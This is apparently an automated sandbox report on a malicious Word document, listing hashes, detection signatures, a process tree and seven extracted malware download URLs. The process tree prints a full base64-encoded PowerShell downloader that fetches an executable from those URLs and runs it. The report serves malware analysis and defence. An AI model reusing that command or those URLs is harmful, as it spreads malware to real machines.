Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    09/05/2024, 11:52

General

  • Target

    29d8be9b74b54b5e4c233ecc69425165_JaffaCakes118.doc

  • Size

    227KB

  • MD5

    29d8be9b74b54b5e4c233ecc69425165

  • SHA1

    96f1741abac9a5d5ec026bfcd6824ec91c51e8e8

  • SHA256

    ebbbf1104be5c5f4f000285e72aa802cdac327750e71a35a101e4ecac224d1d2

  • SHA512

    6cbfacb680c5654a8da20b7d62de5044d0b6d6ad48bf36115097f5510bc250c5cbf1b74fba4b5eaf8f13e8c7bd6189bc80b46d4d784c76002961354152ba1cf9

  • SSDEEP

    3072:9vYy0u8YGgjv+ZvchmkHcI/o1/Vb6//////////////////////////////////z:X0uXnWFchmmcI/o1/saMdGg0wJAAd

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://nurtandemir.com.tr/n/

exe.dropper

http://www.jhomiorganiccotton.com/cgi-bin/qqeO0VU/

exe.dropper

http://wit-consul.com/recruit/A7x/

exe.dropper

http://www.cedem.com.br/cgi-bin/QaxzC/

exe.dropper

http://ozzpot.com/assets/I/

exe.dropper

https://xelnetportal.nl/catalog/DyaBD2/

exe.dropper

http://premieroneescrow.com/PreOneMap/K/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\29d8be9b74b54b5e4c233ecc69425165_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2916
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:356
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABVADUAagA3AF8AYQA0AD0AKAAnAE0AJwArACgAJwBsACcAKwAnAGcAZgB5AGcAJwArACcAdAAnACkAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVABFAE0AUABcAFcAbwBSAEQAXAAyADAAMQA5AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAEQAaQByAGUAYwBUAE8AcgBZADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYABjAHUAcgBpAHQAWQBQAHIAYABvAFQAbwBgAGMATwBMACIAIAA9ACAAKAAnAHQAJwArACgAJwBsAHMAMQAyACwAJwArACcAIAAnACsAJwB0AGwAcwAxACcAKwAnADEAJwApACsAJwAsACcAKwAoACcAIAB0AGwAJwArACcAcwAnACkAKQA7ACQAUwB5AGkAYgBvAGsAaAAgAD0AIAAoACcARABuACcAKwAoACcAMgB3ACcAKwAnAHAAZQBxACcAKQApADsAJABZAHgANgA3AG0AaQB5AD0AKAAoACcASQAnACsAJwA4ADUAawBvAHoAJwApACsAJwA5ACcAKQA7ACQAVABkAHYAegBfADMAcgA9ACQAZQBuAHYAOgB0AGUAbQBwACsAKAAoACgAJwBQACcAKwAnAFUATgB3ACcAKQArACcAbwAnACsAKAAnAHIAJwArACcAZABQAFUATgAnACkAKwAoACcAMgAwADEAJwArACcAOQBQACcAKQArACcAVQBOACcAKQAgAC0AQwByAGUAcABMAGEAYwBFACAAIAAoACcAUAAnACsAJwBVAE4AJwApACwAWwBDAEgAYQBSAF0AOQAyACkAKwAkAFMAeQBpAGIAbwBrAGgAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJABIAHcAaAB5AHcAbAAzAD0AKAAoACcARAAnACsAJwA3ADgAJwApACsAKAAnAGIAJwArACcAdQB3AGoAJwApACkAOwAkAEEAMQBqAHIAegBfADQAPQAmACgAJwBuACcAKwAnAGUAdwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAE4ARQBUAC4AdwBlAGIAQwBsAGkAZQBOAFQAOwAkAFAAbwBiAHYAdQB2AGoAPQAoACcAaAAnACsAKAAnAHQAJwArACcAdABwADoAJwArACcALwAvAG4AJwApACsAJwB1ACcAKwAoACcAcgB0ACcAKwAnAGEAJwApACsAJwBuAGQAJwArACcAZQBtACcAKwAnAGkAcgAnACsAKAAnAC4AJwArACcAYwBvAG0AJwApACsAJwAuACcAKwAoACcAdAByAC8AJwArACcAbgAvACcAKwAnACoAaAAnACkAKwAoACcAdAB0AHAAJwArACcAOgAvACcAKQArACcALwAnACsAKAAnAHcAJwArACcAdwB3AC4AagBoACcAKQArACgAJwBvAG0AJwArACcAaQBvAHIAZwAnACkAKwAoACcAYQBuAGkAJwArACcAYwAnACkAKwAoACcAYwBvAHQAdABvACcAKwAnAG4ALgAnACsAJwBjAG8AbQAvACcAKQArACgAJwBjACcAKwAnAGcAaQAtACcAKQArACcAYgAnACsAJwBpACcAKwAnAG4AJwArACgAJwAvAHEAJwArACcAcQAnACkAKwAoACcAZQBPACcAKwAnADAAVgAnACkAKwAoACcAVQAvACcAKwAnACoAJwApACsAKAAnAGgAdAAnACsAJwB0ACcAKwAnAHAAOgAnACsAJwAvAC8AdwBpAHQAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AcwB1AGwALgBjACcAKwAnAG8AJwArACcAbQAvACcAKwAnAHIAZQBjACcAKQArACgAJwByAHUAaQB0ACcAKwAnAC8AJwApACsAKAAnAEEANwB4AC8AJwArACcAKgBoACcAKwAnAHQAdABwACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAnAHcAdwAnACsAJwB3AC4AJwArACcAYwAnACsAJwBlAGQAJwArACcAZQBtACcAKwAoACcALgAnACsAJwBjAG8AbQAuACcAKQArACcAYgAnACsAJwByACcAKwAoACcALwBjAGcAJwArACcAaQAtACcAKQArACcAYgAnACsAKAAnAGkAJwArACcAbgAvAFEAYQB4ACcAKQArACgAJwB6AEMALwAqACcAKwAnAGgAdAB0AHAAJwArACcAOgAnACkAKwAnAC8AJwArACgAJwAvACcAKwAnAG8AegB6AHAAbwAnACsAJwB0AC4AJwApACsAJwBjAG8AJwArACcAbQAvACcAKwAoACcAYQBzACcAKwAnAHMAJwApACsAKAAnAGUAJwArACcAdABzACcAKQArACcALwAnACsAJwBJACcAKwAoACcALwAnACsAJwAqAGgAJwApACsAKAAnAHQAdAAnACsAJwBwAHMAOgAnACkAKwAoACcALwAvACcAKwAnAHgAZQBsACcAKQArACcAbgAnACsAKAAnAGUAJwArACcAdABwACcAKQArACcAbwAnACsAKAAnAHIAdABhACcAKwAnAGwAJwApACsAKAAnAC4AJwArACcAbgBsACcAKQArACcALwBjACcAKwAoACcAYQB0AGEAJwArACcAbAAnACsAJwBvAGcALwBEACcAKQArACgAJwB5AGEAQgBEADIALwAnACsAJwAqAGgAdAB0ACcAKwAnAHAAOgAnACsAJwAvACcAKQArACcALwBwACcAKwAoACcAcgBlAG0AaQBlAHIAbwAnACsAJwBuAGUAJwArACcAZQAnACsAJwBzACcAKQArACgAJwBjACcAKwAnAHIAbwAnACkAKwAnAHcAJwArACcALgBjACcAKwAoACcAbwBtACcAKwAnAC8AJwApACsAKAAnAFAAcgBlACcAKwAnAE8AbgAnACkAKwAnAGUAJwArACgAJwBNAGEAcAAnACsAJwAvACcAKQArACcASwAvACcAKQAuACIAcwBgAFAAbABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABKAHEAMABuAGYAOAB4AD0AKAAoACcAUgAnACsAJwBmADYAJwApACsAJwAyACcAKwAoACcAbQBqACcAKwAnADAAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABIAHMAdgB4AGQAeQB1ACAAaQBuACAAJABQAG8AYgB2AHUAdgBqACkAewB0AHIAeQB7ACQAQQAxAGoAcgB6AF8ANAAuACIARABvAGAAVwBuAGwAYABPAGAAQQBEAEYAaQBMAEUAIgAoACQASABzAHYAeABkAHkAdQAsACAAJABUAGQAdgB6AF8AMwByACkAOwAkAEwAYQBsADQAOAA0AGkAPQAoACcAVwBsACcAKwAnADIAcgAnACsAKAAnAG0AJwArACcAeABxACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAFQAZAB2AHoAXwAzAHIAKQAuACIAbABlAE4AYABHAHQASAAiACAALQBnAGUAIAAzADQAMgAzADEAKQAgAHsALgAoACcASQAnACsAJwBuAHYAbwBrAGUAJwArACcALQBJAHQAJwArACcAZQBtACcAKQAoACQAVABkAHYAegBfADMAcgApADsAJABEADgAOQAxAHUAdQBuAD0AKAAoACcAWQBhACcAKwAnAHEAcgBhACcAKQArACcAaAA3ACcAKQA7AGIAcgBlAGEAawA7ACQATAB3AHUAawBxADMAdgA9ACgAJwBKAHIAJwArACgAJwA2AGcAZgA5ACcAKwAnAGIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEQAYwBoAG0AYQAyADcAPQAoACgAJwBZACcAKwAnADUAXwA0ACcAKQArACcAMwAnACsAJwBlADYAJwApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2444

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      fca26ff0537f56cfffa661eda569bfe5

      SHA1

      337b30a64ee776fdb4a6fb6c391516d9ac7ea014

      SHA256

      84ef45e3610a0b2a99467f5b0ca95d8c041cbca1e569f83243ca5fc14ac85956

      SHA512

      999329d1018feba89fc9249f7e13d6a310d550ccfb2efd1deac0d0dce7585e7b68616464c683aef9c1b04d1a4fcad3ce5ce5d0f5ccbfc14890c1aac001d7b907

    • memory/2444-40-0x000000001B620000-0x000000001B902000-memory.dmp

      Filesize

      2.9MB

    • memory/2444-41-0x0000000002240000-0x0000000002248000-memory.dmp

      Filesize

      32KB

    • memory/2916-34-0x00000000058E0000-0x00000000059E0000-memory.dmp

      Filesize

      1024KB

    • memory/2916-7-0x00000000058E0000-0x00000000059E0000-memory.dmp

      Filesize

      1024KB

    • memory/2916-26-0x00000000058E0000-0x00000000059E0000-memory.dmp

      Filesize

      1024KB

    • memory/2916-27-0x00000000058E0000-0x00000000059E0000-memory.dmp

      Filesize

      1024KB

    • memory/2916-28-0x00000000058E0000-0x00000000059E0000-memory.dmp

      Filesize

      1024KB

    • memory/2916-0-0x000000002FB11000-0x000000002FB12000-memory.dmp

      Filesize

      4KB

    • memory/2916-33-0x00000000058E0000-0x00000000059E0000-memory.dmp

      Filesize

      1024KB

    • memory/2916-8-0x0000000005CB0000-0x0000000005DB0000-memory.dmp

      Filesize

      1024KB

    • memory/2916-2-0x000000007151D000-0x0000000071528000-memory.dmp

      Filesize

      44KB

    • memory/2916-47-0x000000007151D000-0x0000000071528000-memory.dmp

      Filesize

      44KB

    • memory/2916-48-0x00000000058E0000-0x00000000059E0000-memory.dmp

      Filesize

      1024KB

    • memory/2916-49-0x00000000058E0000-0x00000000059E0000-memory.dmp

      Filesize

      1024KB

    • memory/2916-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2916-65-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2916-66-0x000000007151D000-0x0000000071528000-memory.dmp

      Filesize

      44KB